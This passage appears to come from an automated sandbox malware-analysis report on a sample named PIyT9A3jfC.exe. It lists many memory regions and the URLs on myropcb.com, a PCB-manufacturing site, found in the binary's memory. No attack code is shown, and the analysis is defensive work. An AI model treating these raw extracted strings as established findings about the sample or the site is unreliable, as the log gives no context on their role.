PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/contact-us/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/contact-us/suggestion-box/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/download/DownloadApk.php
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/faq/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/feed/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/my-cart/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/bom/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/fpc-quote/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/parts/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-and-schematic-design/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-assembly-quote/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-design-quote/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-production-quote/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/stencil-quote/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/qqqqqqqqqqqqqqqq
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/an-introduction-to-high-density-interconnect-hdi-pcbs/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/components-parts/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 